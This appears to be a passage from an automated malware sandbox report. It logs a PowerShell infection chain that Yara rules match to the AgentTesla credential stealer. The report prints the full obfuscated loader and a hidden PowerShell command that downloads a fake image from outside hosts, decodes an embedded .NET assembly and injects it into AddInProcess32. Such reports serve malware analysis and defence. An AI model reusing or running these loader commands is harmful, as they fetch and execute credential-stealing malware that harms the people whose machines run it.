QBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTreUDgTreBSDgTreE8DgTreSgBFDgTreFQDgTreTwBBDgTreFUDgTreVDgTreBPDgTreE0DgTreQQBDDgTreEEDgTreTwDgTreuDgTreFYDgTreQgDgTreuDgTreEgDgTrebwBtDgTreGUDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreG0DgTreZQB0DgTreGgDgTrebwBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTreuDgTreEcDgTreZQB0DgTreE0DgTreZQB0DgTreGgDgTrebwBkDgTreCgDgTreJwBWDgTreEEDgTreSQDgTrenDgTreCkDgTreLgBJDgTreG4DgTredgBvDgTreGsDgTreZQDgTreoDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTresDgTreCDgTreDgTreWwBvDgTreGIDgTreagBlDgTreGMDgTredDgTreBbDgTreF0DgTreXQDgTregDgTreCgDgTreJwB0DgTreHgDgTredDgTreDgTreuDgTreGQDgTreaQBvDgTreHIDgTreZDgTreDgTre0DgTreDYDgTreZQBzDgTreGEDgTreYgDgTrevDgTreDEDgTreOQDgTreuDgTreDQDgTreMQDgTreyDgTreC4DgTreNQDgTre0DgTreDIDgTreLgDgTreyDgTreDcDgTreMQDgTrevDgTreC8DgTreOgBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreLDgTreDgTrenDgTreEEDgTreZDgTreBkDgTreEkDgTrebgBQDgTreHIDgTrebwBjDgTreGUDgTrecwBzDgTreDMDgTreMgDgTrenDgTreCwDgTreJwDgTrenDgTreCkDgTreKQB9DgTreCDgTreDgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	3
Start time:	19:42:01
Start date:	15/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	4
Start time:	19:42:02
Start date:	15/02/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/739/228/original/new_image_wsf.jpg?1707826743', 'http://45.74.19.84/xampp/bkp/new_image_wsf.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.diord46esab/19.412.542.271//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	8
Start time:	19:42:31
Start date:	15/02/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Imagebase:	0x610000
File size:	43'008 bytes
MD5 hash:	9827FF3CDF4B83F9C86354606736CA9C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.3367046963.0000000002915000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.3359661563.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3359661563.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false